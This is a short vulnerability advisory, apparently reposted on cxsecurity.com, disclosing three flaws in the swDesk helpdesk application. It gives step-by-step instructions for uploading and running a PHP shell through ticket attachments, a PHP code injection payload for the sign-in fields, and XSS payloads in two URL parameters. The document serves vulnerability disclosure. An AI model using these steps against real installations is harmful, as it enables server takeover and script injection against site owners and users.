swDesk Shell Upload / Code Injection / XSS

2012.02.02
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-94

# # Title : swDesk Multi Vulnerability # Author : Red Security TEAM # Date : 01/02/2012 # Risk : High # Vendor : http://www.swdesk.com/ # Demo : http://www.swdesk.com/demo/swdesk/ # Tested On : Apache # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # # I. Arbitrary File Upload Vulnerability # 1. Go to http://server/create_ticket.php # 2. Fil all Input Fields And Click on Submit Ticket # 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1 # 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message # 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed ;) # # II. PHP Code Injection Vulnerability # 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password # 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)} # # III. XSS Vulnerability # 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad=" # 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search # # Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/ #

References:

http://www.swdesk.com/
http://www.swdesk.com/demo/swdesk/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top